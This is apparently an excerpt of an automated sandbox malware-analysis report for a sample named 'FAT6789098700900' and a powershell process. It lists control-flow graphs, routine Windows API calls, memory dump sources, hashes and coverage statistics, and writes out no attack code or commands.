                                                                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 026B59C9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4126782053.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_26b0000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                                                              • Opcode ID: 3c4dda23ac9ac465023a51032f98d191f2fa608a84b39060e3efaff34b7a6a3e
                                                                                                                                                                                                                              • Instruction ID: d9bd8c42e6dd0d1583d6b93060703f1fc99fb49d9b2ff18675b573ee10fb534a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c4dda23ac9ac465023a51032f98d191f2fa608a84b39060e3efaff34b7a6a3e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD41E2B0C00719CBDF24DFA9C8847DDBBB5BF49304F64805AD409AB251DB756989CF90

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 409 26bd3b8-26bd3bc 410 26bd3be-26bd3ff 409->410 411 26bd402-26bd454 DuplicateHandle 409->411 410->411 412 26bd45d-26bd47a 411->412 413 26bd456-26bd45c 411->413 413->412
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,026BD386,?,?,?,?,?), ref: 026BD447
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4126782053.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_26b0000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                                                                                              • Opcode ID: ac87aa4e04441334d65b84982d99bef73d9df2e3baf2e56676b51120acc7f8f7
                                                                                                                                                                                                                              • Instruction ID: 6ab970b6d07bc3b873d6714756efd0624aa8b852ee65f00aea19b9630f69ada0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac87aa4e04441334d65b84982d99bef73d9df2e3baf2e56676b51120acc7f8f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E22166B59002499FCB10CFAAD584ADEFFF4EF49320F14815AE958A7350C374A981CFA0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 416 26bb410-26bd454 DuplicateHandle 418 26bd45d-26bd47a 416->418 419 26bd456-26bd45c 416->419 419->418
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,026BD386,?,?,?,?,?), ref: 026BD447
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4126782053.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_26b0000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                                                                                              • Opcode ID: 9385116a6d5e1b21debfe2c27542c47691520d3b6399e5c00f8c600d137a9d7f
                                                                                                                                                                                                                              • Instruction ID: e65cc769b1abaec316e16a3df5c6bb18c3bc7dd1ce4414dface2668567dfb8e6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9385116a6d5e1b21debfe2c27542c47691520d3b6399e5c00f8c600d137a9d7f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D621E3B5900358AFDB10CF9AD584ADEBBF8EF48314F14805AE918A7310D374A954CFA5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 422 26bafb0-26baff0 423 26baff8-26bb023 GetModuleHandleW 422->423 424 26baff2-26baff5 422->424 425 26bb02c-26bb040 423->425 426 26bb025-26bb02b 423->426 424->423 426->425
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 026BB016
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4126782053.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_26b0000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                                                                              • Opcode ID: e94753dcab7b1157e63517cfeb749523b81d80bc608a68627f5e0c7f651a6ffc
                                                                                                                                                                                                                              • Instruction ID: 0abb8a05cb7a5e423241dad8a7d3a8cb12eeed92d98bb0eafee13ace32f9dcd9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e94753dcab7b1157e63517cfeb749523b81d80bc608a68627f5e0c7f651a6ffc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 871102B5C003498FCB20CF9AC444ADEFBF4EF48314F14846AD828A7210C375A585CFA1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 428 53e5670-53e6cca OleInitialize 430 53e6ccc-53e6cd2 428->430 431 53e6cd3-53e6cf0 428->431 430->431
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 053E6CBD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4139468325.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_53e0000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                                              • Opcode ID: 3db3c467d293c916e470fad09a7e45fc47078114bb9f7d927bae53d3bce9f02e
                                                                                                                                                                                                                              • Instruction ID: a6e2c639c852ea274d51ab7df3e032aad13c26645b62bf8c4c3fea89d89901f0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3db3c467d293c916e470fad09a7e45fc47078114bb9f7d927bae53d3bce9f02e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF1130B48003588FCB20DF9AD589BDEBBF8EB48320F208459D518B7350C378A944CFA4

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 434 53ef280-53ef283 435 53ef288-53ef2f2 DispatchMessageW 434->435 436 53ef2fb-53ef30f 435->436 437 53ef2f4-53ef2fa 435->437 437->436
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4139468325.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_53e0000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DispatchMessage
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2061451462-0
                                                                                                                                                                                                                              • Opcode ID: f7c8d393d42b9a26293a61aa406182b73d17c67322d3127b5c68fd1f967efae8
                                                                                                                                                                                                                              • Instruction ID: 7e84c5b7d419b4238cfed8b1c57089c5f82d8e9b9dbba321e0d5ba46972c4e10
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7c8d393d42b9a26293a61aa406182b73d17c67322d3127b5c68fd1f967efae8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB11FEB9C046598FCB10DF9AD845BCEFBF4EB48324F20842AD469B3250D378A544CFA5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 439 53ef288-53ef2f2 DispatchMessageW 440 53ef2fb-53ef30f 439->440 441 53ef2f4-53ef2fa 439->441 441->440
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4139468325.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_53e0000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DispatchMessage
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2061451462-0
                                                                                                                                                                                                                              • Opcode ID: ed60f41d9aa3576434567ac2128e1939bb6befe8b3ce5128300fdaa96076bbbc
                                                                                                                                                                                                                              • Instruction ID: afd0dc3d04ecf4d2e4fc3738e88ad6f0d71efd5c7578cda32ee37c160a910120
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed60f41d9aa3576434567ac2128e1939bb6befe8b3ce5128300fdaa96076bbbc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D11FBB9C042598FCB10CF9AD444BCEFBF8EB48324F20842AD469A3250D378A544CFA5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 443 53e6c61-53e6cca OleInitialize 444 53e6ccc-53e6cd2 443->444 445 53e6cd3-53e6cf0 443->445 444->445
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 053E6CBD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4139468325.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_53e0000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                                              • Opcode ID: 113e36c10041598cb77b6567c751f712074269e2163f1e83d21d761e1849473a
                                                                                                                                                                                                                              • Instruction ID: 25110603cddd32f87b2796b37b0a3d25d2b62ae8bad3355bb22156813a1135be
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113e36c10041598cb77b6567c751f712074269e2163f1e83d21d761e1849473a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 261112B5C00358CFCB10DFAAD585BDEBBF4EB08320F24845AD458A7250D378A944CFA5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4126035921.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fbd000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 9ed01dbe8f09b58fca960b5a99b1dfd7cd59bc9b9b575e34ccfd733706f56c1f
                                                                                                                                                                                                                              • Instruction ID: 8e1067ecb4dd3cf1e7ac766aac222e15b4a449a4e8e153898d743585d7b7fb33
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ed01dbe8f09b58fca960b5a99b1dfd7cd59bc9b9b575e34ccfd733706f56c1f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2216772500200DFCB04DF04C9C0B66BFA5FB98324F20C669E8090B256D33AE846EFA3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4126175918.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fcd000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: d8cc004b166feafd32555033890b35d5c3add8b4e5d32f5c5a4b89971bb1c34e
                                                                                                                                                                                                                              • Instruction ID: 9c403de741f4c9494a42032edf58a6befa7c87a85cc01fbfdad5cdd4f3f77153
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8cc004b166feafd32555033890b35d5c3add8b4e5d32f5c5a4b89971bb1c34e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E421F571584201DFCB14DF18D6C5F1ABBA5FB84324F20C57DD84A4B25AC336D847DA61
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4126175918.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fcd000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: f904b8020b62bf6d6b6d3ff9d0d7cb43164cca8d37e4b0d2222350bab041decd
                                                                                                                                                                                                                              • Instruction ID: fd644ca2c0bdd00d4f09605e00fb2433b5209be0f5acd4b1fa74477e8201d83a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f904b8020b62bf6d6b6d3ff9d0d7cb43164cca8d37e4b0d2222350bab041decd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59213872504285DFDB00DF14DAC5F2EBB65FB84324F24C57ED8494B241C33AD846EAA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4126175918.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fcd000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 92747110116f4c55f311046300e42c842ef0c55a4bdcf0ffb022eddf3cbbb537
                                                                                                                                                                                                                              • Instruction ID: f9f98cf71fcb3facc7558f3d05d768d3e324d6d7ec3659c08fe4b35d60d69240
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92747110116f4c55f311046300e42c842ef0c55a4bdcf0ffb022eddf3cbbb537
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 662183755493808FD702CF24D594B15BF71EB46314F28C5EED8498F6A7C33A980ACB62
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4126035921.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fbd000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                              • Instruction ID: 55624cd660ee523d369a70f9aa0a3c47ce32e62096cf78299a331ad221c95509
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF110376804240CFCB06CF00D5C4B56BF71FB94324F24C6A9D8090B256C33AE85ADFA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4126175918.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fcd000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                                                                                              • Instruction ID: 926459edb0caec74e040c200cf0831ec29c43a1d31834ca6cdafedf9de401685
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E711B275904684CFDB12CF14D6C4B1AFF61FB84324F24C6AED8494B656C33AD80ADBA2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4139468325.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_53e0000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                                                                                                                              • API String ID: 0-1677660839
                                                                                                                                                                                                                              • Opcode ID: 31080d89ea6c3eff44626090cef1987fe4221ad5725dceb296c0303ad9e3ea7c
                                                                                                                                                                                                                              • Instruction ID: 1b9133e4ec8960294596a007ed13d89c49a625367f67df4dae9a586ba407d1c7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31080d89ea6c3eff44626090cef1987fe4221ad5725dceb296c0303ad9e3ea7c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED426E34E002288FDB54DFA9C89479EBBF6BF88300F14856AE409AB395DB34AD45CF51
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4139468325.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_53e0000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: d5af781d8691fec8315ffb0b413a7986107f160059b5f71be93bd42b2179e683
                                                                                                                                                                                                                              • Instruction ID: e5b9d31f3b82ab552f5fe97ad94ba891afff9923c9b412022a62cedf56194154
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5af781d8691fec8315ffb0b413a7986107f160059b5f71be93bd42b2179e683
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FC12C35A002288FDF15DFA5C880B9EBBF2BF84310F14C5A9E449AB295DB70E985CF51
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4126782053.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_26b0000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: abcbc453f9bda2128cbe0faeca3ebd9d08eb3a10203e44ef62213935df818606
                                                                                                                                                                                                                              • Instruction ID: 9267ad2b6992918f8116514d218edc1d324acc35226bf8cd746d057f77346008
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abcbc453f9bda2128cbe0faeca3ebd9d08eb3a10203e44ef62213935df818606
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AA16E36E002198FCF1ADFB4C8805DEB7B2FF85304B15456AE805AB265DB71D995CF80
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.1671965264.0000000003710000.00000040.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3710000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 7c4a44c77eb87d16bb0fc53610677c8db06eff30be63b5a0c888d816683d97d7
                                                                                                                                                                                                                              • Instruction ID: 60e5a556fb06f3c8aefb20d63dcb01013f217222d58cb0383d60c876c3215f74
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c4a44c77eb87d16bb0fc53610677c8db06eff30be63b5a0c888d816683d97d7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58819035A05258DFCB15CF69D4809AEFBF6EF89300F1480A9E944AB362C735ED59CB60
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.1671965264.0000000003710000.00000040.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3710000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 367b2876318548ffbe7d4702e8d17b4a95aa725c001eb5a74277db045fe43812
                                                                                                                                                                                                                              • Instruction ID: 74bc102e3c45602f9c64d7ebfa2066085e05e8a4e185f3fafedf364d90653125
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 367b2876318548ffbe7d4702e8d17b4a95aa725c001eb5a74277db045fe43812
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE916971A002458FCB15CF5DC4949AEFBB1FF88310B248999D915AB3A6C736FC51CBA0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.1671965264.0000000003710000.00000040.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3710000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 155684e8f2a42f600b6255045e51ffd56445d508c6e015db4d1223ddf7983e88
                                                                                                                                                                                                                              • Instruction ID: 7e76bb9793f4cca81d7923766d3ccbf24a32cffd1815f63f0d3af4ba2f442c80
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 155684e8f2a42f600b6255045e51ffd56445d508c6e015db4d1223ddf7983e88
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 624148B5A005058FCB19CF58C1989BAFBB1FF48310B258599C915AB366C736FC61CFA0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.1671776329.00000000035BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035BD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_35bd000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: ea3f1dec80b6cbefec6ec1c737ff1fdac98faf643820bd63a92992bd0de0fc39
                                                                                                                                                                                                                              • Instruction ID: 5040e8076f4262f95fa95aae19404d6431ee366f4dd545d52d99555a13f62737
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea3f1dec80b6cbefec6ec1c737ff1fdac98faf643820bd63a92992bd0de0fc39
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B01F7310093089AE710CF26D9847A7FFF8FF41324F0CC869EC080A256D279D841C6B1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.1671776329.00000000035BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035BD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_35bd000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 822c5db57c5dd17fa92f379a33c7da095d10b96372f5a059555390d6f6475e10
                                                                                                                                                                                                                              • Instruction ID: 1771b2987796be923b6a88a461d202c658fa0434765de805de5cfb4dc7312d89
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 822c5db57c5dd17fa92f379a33c7da095d10b96372f5a059555390d6f6475e10
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D601447100D3C45ED7128B25D894752BFB4EF43224F1D84CBD8888F1A3C2699849C772

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:10.1%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                              Total number of Nodes:213
                                                                                                                                                                                                                              Total number of Limit Nodes:24
